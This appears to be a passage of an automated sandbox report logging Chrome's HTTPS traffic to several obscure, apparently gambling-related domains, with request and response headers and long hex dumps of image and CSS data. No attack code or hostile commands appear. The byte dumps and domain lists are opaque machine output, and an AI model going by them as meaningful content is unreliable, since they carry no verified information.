                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 52 27 4d bf f6 e2 45 db 6a ba 59 e1 b2 d5 b4 17 00 8c 34 01 0f 2f 98 f2 8e cc c8 04 12 17 b4 e9 84 97 fd f9 f0 61 7d fb 0f da a2 77 55 36 20 71 a4 00 62 b2 ee 1b 9a 5a a6 49 a6 eb 9d ac 43 86 cc 0c 32 99 67 3a 93 7d 94 25 af 58 b1 36 91 05 8c 15 ef 0a ff 73 11 b6 a7 73 5d a4 ce b2 01 a9 3a 81 d7 51 3d 72 52 6f 92 09 7b 01 9f 1e 37 cd 4e f9 f9 6e e3 49 c7 56 4a e4 1f 47 b6 b8 f5 8e d7 57 a4 d3 a9 55 e5 15 d1 11 5b 8d db 22 42 08 06 b5 ee 6a c7 50 d7 2d 78 0d 1b 7a 0e 40 44 86 06 80 dc 33 00 19 18 c1 00 bc 69 b9 ee a7 f0 26 f4 98 29 1a a0 29 18 a7 b9 f0 91 c7 3e 49 65 d1 8f 2d b9 62 c4 d0 be 3b 3b 39 1f 64 e8 ae a1 e4 a0 30 32 8d 2b 5b 53 19 62 53 33 9c e1 ba 1c 76 9b de fd 20 f8 1c 79 d8 8e 63 7c 18 32 b2 37 df bc 16 d6 c5 7e f7 fd d2 6f 6d 8d d8 df 17 99
                                                                                                                                                          Data Ascii: R'MEjY4/a}wU6 qbZIC2g:}%X6ss]:Q=rRo{7NnIVJGWU["BjP-xz@D3i&))>Ie-b;;9d02+[SbS3v yc|27~om
                                                                                                                                                          2024-06-09 22:41:21 UTC14108INData Raw: e7 e9 ee de d2 21 9b 93 c9 7b af 15 53 fb cc 4b de ac a8 5d d3 38 6f 64 fe c0 93 df 7c f6 b4 3f b2 a8 6d b2 50 5d c0 76 55 1b 5f 7a 7d c5 ca 63 cf 78 e8 b9 f6 20 eb 90 1d 1a 3a 2d 60 75 72 24 41 07 09 17 75 26 89 3a 94 38 1c d4 0d db 6d 00 23 05 ca 88 13 46 8c c4 a4 64 02 62 a7 94 2c 7e ef 20 b3 8a 88 73 4b d4 c1 43 0c 22 ce 48 c2 bc b8 45 20 26 49 57 6c 95 f0 9a 0b af a8 5c 5e 31 ff 8b ad 16 84 40 98 b8 6d ff f7 ed 47 8f 3b e2 b0 dd 8f 5e b7 a1 a5 ea 4f 7f 7d ef 7e 54 61 04 b1 6e b2 30 d1 85 bc 36 a2 aa 10 ec 38 61 44 3b 1b 1b 9c 5d 4c fc 2a 9e 96 f0 f4 b9 82 57 05 c8 d0 90 df 61 86 ed e3 08 9b ee 79 2f 33 3c f7 ce ef 39 86 6c 0d 5a ad 3f 5e 45 bd f7 44 07 6e 5d bb ae a1 f9 c2 ab 16 3c b8 79 6b c7 e2 3d c7 0c 9d f5 ee bc df 9e c6 a2 e6 53 0d 82 25 83 0a
                                                                                                                                                          Data Ascii: !{SK]8od|?mP]vU_z}cx :-`ur$Au&:8m#Fdb,~ sKC"HE &IWl\^1@mG;^O}~Tan068aD;]L*Way/3<9lZ?^EDn]<yk=S%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          590192.168.2.550363103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC385OUTGET /zb-cloud/pwv/sn.website.pronotice.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:21 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:21 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          2024-06-09 22:41:21 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:21 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:21 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:21 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:21 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:21 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:21 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          591192.168.2.55036854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC639OUTGET /pc/image-pc/video/og_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-3d3c"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15676
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 2777896519274957487
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          592192.168.2.55036943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC372OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC344INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 59673720771914694
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1119INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 11 00 02 11 01 03 11 01 ff c4 00 b1 00 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 02 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 02 01 03 03 02 05 02 03 05 07 02 04 07 00 00 01 02 03 11 04 05 00 12 06 21 31 41 51 22 13 07 61 14 71 32 15 81 91 42 52 23 a1 b1 d1 62 24 16 08 c1 53 f0 72 82 17 e1 92 d2 33 43 63 34 11 00 01 03 02 04 03 05 05 07 03 03 04 03 00 00 00 01 00 11 02 03 04 21 31 12 05 41 51 61 71 22 32 13 06 81 91 a1 42 52 f0 b1 c1 d1 62 23 14 72 82 15 e1 33 24 f1 92 53 16 a2 b2 43 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 c0 5a fa 0d 78 22 1a 10 86 84 2f 6b a1 22 1a 12 af 34 21 0d 08 43 42 10 d0 85 ee 91 d0 86 95 08 c8 a1 96 79 12 18 22 79 a5 90 d2 38 91 4b 33 1f 20 07 53 a4 25 b3
                                                                                                                                                          Data Ascii: !1AQ"aq2BR#b$Sr3Cc4!1AQaq"2BRb#r3$SC?Zx"/k"4!CBy"y8K3 S%
                                                                                                                                                          2024-06-09 22:41:21 UTC1400INData Raw: e3 8c 8a d5 b1 72 6e 23 69 f2 6f c4 5c 1b 37 65 65 94 c3 fc 6d f1 34 5c a7 e3 fb 47 67 8a e2 6e 5d 91 48 ef c4 b6 8c ac 12 59 a6 21 7d b4 91 59 43 0a 8f 56 b8 cd c2 e2 b4 ac ee 2f 63 22 25 2a be 54 f9 08 e1 89 e2 18 96 f7 3a eb 6d a3 48 5e db d9 ca 02 51 8d 2f 32 3c f5 82 72 c5 8e 00 95 9e 26 93 e3 59 3f e3 47 c8 f9 7e 04 79 c6 0b 7e 62 c6 ef 29 9f cf 5c c7 1d de 73 31 24 c2 d8 58 fb d6 bb 63 9e de 38 e6 9a 4d a1 43 54 b1 7f 01 a9 6a d4 bc 96 ff 00 6b 6b 73 0a 40 00 d1 84 7b d1 85 3f 11 91 7c 8f 77 8f 04 fa 22 d8 6c f7 17 14 27 50 92 5c ca 58 4a 53 c8 0e a3 16 c3 8a 45 ca 20 e5 5c 1f e3 bc 47 0c e1 08 d7 5f 2d 61 f0 10 af ca 79 ab 78 e5 7e 47 84 c2 e4 29 3a e3 2d dc 1d d6 d1 a3 5c 22 c9 2c 5f d4 0a c1 2a aa da 5d ba e6 cf 74 de 2a d6 bc 3e 5d 84 ea 13 4c
                                                                                                                                                          Data Ascii: rn#io\7eem4\Ggn]HY!}YCV/c"%*T:mH^Q/2<r&Y?G~y~b)\s1$Xc8MCTjkks@{?|w"l'P\XJSE \G_-ayx~G):-\",_*]t*>]L
                                                                                                                                                          2024-06-09 22:41:21 UTC2696INData Raw: 14 87 e5 fe 75 c7 fe 46 c0 f1 09 a6 c2 5c f1 5f 93 b8 cc d7 d8 de 5d 88 6b 62 b6 52 da a6 d2 af 14 a4 fb 91 b4 32 23 d6 19 54 14 de ea 19 b6 d4 e2 fa 33 63 bd f4 f5 ec e2 25 e6 d9 56 88 94 6a 03 91 1e 17 8f d5 27 6c 1c 1c 0f 66 bf aa f7 8b 4d f2 d2 12 23 cb bb a5 2d 26 07 8b f8 98 fd 31 67 c7 ae 1c dd 6d bf e3 d7 32 cb 7c 73 f1 ff 00 3f e2 58 2c 8e 6b 21 cc ff 00 54 19 2e 3b 61 65 3c bf 6d 6d 63 75 0d bd b5 e0 6a b9 2b 33 4a 43 0f 0d bb 87 42 76 ee 5c 7a 82 34 6f 6b 5a 5c 54 89 10 ef 46 58 45 81 00 e8 3c c8 e0 78 b1 7e 0b 95 bc f4 fc ae 6c 28 dc db 53 96 a9 1d 26 38 c9 f3 1a c7 20 70 71 c1 c2 a9 b9 47 02 e6 9c 67 95 e5 b8 3e 53 09 79 67 ca f0 57 2d 05 dd 8a a9 57 46 5e ab 20 63 40 62 75 21 d5 ff 00 2b 29 0c 0d 08 d5 eb 2b ba 37 94 85 5a 44 4a 07 ec 56 0d
                                                                                                                                                          Data Ascii: uF\_]kbR2#T3c%Vj'lfM#-&1gm2|s?X,k!T.;ae<mmcuj+3JCBv\z4okZ\TFXE<x~l(S&8 pqGg>SygW-WF^ c@bu!+)+7ZDJV
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 77 05 bf b2 c5 5f e0 e0 b8 39 d9 6f 62 b5 36 d6 97 2f 76 d3 24 75 84 b2 b9 22 30 40 52 6b e5 e6 fe a1 da 68 d9 7f cb a9 32 5e a0 70 43 e1 23 8e 2c f8 70 c7 a2 f5 0f 4c ef b7 17 e0 59 c2 00 18 d2 2c 78 ea 88 68 f4 c7 8e 78 aa 6b e0 9e 5d c9 71 83 93 4f f1 9f 0a 4e 41 ca 32 78 eb 8b 7c 37 36 ca 88 ad ec 2c 8e ef 7e 71 71 2c c5 63 58 ae 15 3d 44 c8 0b 49 b3 71 ea 4e ad 7a a2 a5 9c ac e8 c2 ad 6f 2e 96 b8 99 40 37 99 28 1c 04 a3 00 fe 1f 16 47 02 4f 6d 7f 48 d2 bb a7 77 5e 42 99 ab 53 49 02 65 cc 04 c6 26 26 5d 72 cf 35 63 62 39 47 04 c9 da 49 85 e2 98 ab df f7 14 1c 32 e3 0f 95 e7 79 2c 94 90 58 db 5b d8 c6 f7 17 38 bb 63 71 2b b9 b5 69 44 91 c7 71 20 5d ca e1 57 72 39 3a e3 37 3d b7 74 a1 6b fc ca 84 46 da 55 63 28 8d 23 54 9f 08 d4 31 1d 31 31 7f 62 ee 6c
                                                                                                                                                          Data Ascii: w_9ob6/v$u"0@Rkh2^pC#,pLY,xhxk]qONA2x|76,~qq,cX=DIqNzo.@7(GOmHw^BSIe&&]r5cb9GI2y,X[8cq+iDq ]Wr9:7=tkFUc(#T111bl
                                                                                                                                                          2024-06-09 22:41:21 UTC1400INData Raw: d4 2b ed c8 15 a3 71 b5 d1 a8 54 8f 22 0f 43 5d 57 31 54 d3 c5 b6 37 8f 48 e2 68 31 e9 69 21 3b c4 96 92 3c 06 b4 ee 02 30 1e 3e 5a 61 2f 9a 96 35 e6 38 a7 02 82 15 2b 15 fe 43 6b 10 e1 7e e5 d8 54 10 6b 53 d6 9d 34 29 7f 97 53 9a e0 5c 5a bb ca d7 05 e6 69 19 4c 86 67 67 0c ca 28 09 04 d0 d3 f0 d0 99 2b 89 cb 32 53 92 4d 13 a9 44 0b 4a 74 a5 3b 0e da 45 12 ad 39 3f 19 c9 5c 99 24 b2 8c b8 90 75 2a 7d 5f b0 69 d1 2d 9a 92 9c 84 24 e4 2a d7 fd bf 9a b5 91 44 f8 fb 80 8c c3 7b 04 23 a0 f1 ed a9 a7 38 c8 32 d2 8d dd 31 8b b2 93 e3 a1 b9 84 cf 23 2d e0 96 e1 c2 90 90 96 6a 77 2c be b0 00 e9 4e bd 75 8d 7d b5 50 bb 86 9a 91 1e cc 15 9b 7d de a5 bc de 13 75 29 92 0a 41 77 1c 36 d7 77 a6 34 58 a2 01 16 18 e7 6a fe 60 cc 58 af 9d 68 2b db 58 bf fa c4 04 c4 85 43
                                                                                                                                                          Data Ascii: +qT"C]W1T7Hh1i!;<0>Za/58+Ck~TkS4)S\ZiLgg(+2SMDJt;E9?\$u*}_i-$*D{#821#-jw,Nu}P}u)Aw6w4Xj`Xh+XC
                                                                                                                                                          2024-06-09 22:41:21 UTC1580INData Raw: 7a b7 c8 19 98 36 c2 c9 4a 51 e1 2f b4 a5 03 56 a5 52 2a 13 26 d3 93 1e 2c 78 51 d3 f7 f4 93 67 b9 1b aa 34 de 9b c4 1d 5c e3 c1 c6 46 b6 af bb ac 5f 2c a7 f2 29 e5 a7 98 e7 30 76 38 73 6b 69 c5 ef 6e b0 f6 d1 e2 e1 bd f6 24 5b 39 e4 8b de 0b 77 73 79 22 99 36 d4 8f 74 81 e1 e6 7a 0b 58 53 9d 18 ca 45 dc 03 8b 60 e3 2c 00 1f 05 8d 73 7f 2a 75 67 18 b0 62 46 0f 8b 16 7c 49 3f 15 3a e6 bf 15 72 48 3e 3c f8 9b 22 6c a3 8a f6 e2 d2 f1 f9 4c d1 c6 ab 71 1c b7 93 0b db 11 72 e5 55 98 bd a4 8b b0 31 34 da c0 76 d5 6b 4a f1 95 7a b1 00 b3 86 e5 87 76 4d fd d9 a9 37 1a 95 63 6d 4a 40 12 48 2e dd 71 8b f6 c7 f1 56 4f c7 b8 eb 25 e2 7c ae e7 2d 87 b0 95 2c 6e 71 51 47 3b 61 f1 59 f9 a2 49 52 ef 70 4b 5b d9 12 31 bc c6 b5 21 81 e9 d2 ba 65 dd 3a a6 a4 23 17 c4 4b e6
                                                                                                                                                          Data Ascii: z6JQ/VR*&,xQg4\F_,)0v8skin$[9wsy"6tzXSE`,s*ugbF|I?:rH><"lLqrU14vkJzvM7cmJ@H.qVO%|-,nqQG;aYIRpK[1!e:#K
                                                                                                                                                          2024-06-09 22:41:21 UTC1491INData Raw: cf 48 95 d1 c9 2b d0 04 66 e9 e2 74 24 4a 16 69 07 e6 72 2b e3 e1 a5 4a 8c 12 33 01 b5 80 23 a5 2b e5 f8 e8 4a 9b ee 61 4b af 61 ae 61 4b 83 04 8b 34 0d 22 83 ed ba 30 21 94 f7 06 a3 c0 e8 05 92 09 11 92 cd 8b 2f d7 a6 ad 69 5a a6 09 4c 73 fd 7e 80 7f d7 4d 21 47 2a 69 c2 2b bd a4 75 3f 4d 35 94 12 a4 9d 20 c8 50 28 e8 29 db f6 e9 14 26 04 27 58 ee d1 c0 50 69 4f ef d0 98 52 a4 61 5a 83 46 3d bf c3 48 e9 1d 97 41 e5 5a 53 f2 f8 9d 08 74 72 dc 3d 45 41 ad 0f 87 80 d0 91 d3 0c b8 40 f7 32 dc e3 af 65 c6 cf 29 2d 22 a7 58 cb 1e a4 d2 a3 56 29 5c ce 9e 45 5a a7 79 28 06 21 c2 53 fa 77 28 ba 68 84 97 76 37 62 04 58 a0 77 89 63 3b 41 e9 bb 62 29 3f 52 7a fd 75 6e 9e e9 28 e6 14 df ce 87 22 a5 d8 dc 3e 70 c3 6b 6f 70 98 b5 82 22 5e 46 48 89 98 b9 a8 e9 26 da ed
                                                                                                                                                          Data Ascii: H+ft$Jir+J3#+JaKaaK4"0!/iZLs~M!G*i+u?M5 P()&'XPiORaZF=HAZStr=EA@2e)-"XV)\EZy(!Sw(hv7bXwc;Ab)?Rzun(">pkop"^FH&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          593192.168.2.55037523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC377OUTGET /pc/image-pc/index/383/menu/nv3.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1790
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-6fe"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[2],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464728
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 950d33df1da75c7248616e952b9a288e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127272
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1790INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1a 08 06 00 00 00 a9 4a 4c ce 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRJLtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          594192.168.2.550373183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC669OUTGET /061410/rcenter/common/themes/default/bootstrap-dialog/bootstrap-dialog.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC657INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-116-13
                                                                                                                                                          ETag: W/"655579ca-76f"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:21 GMT
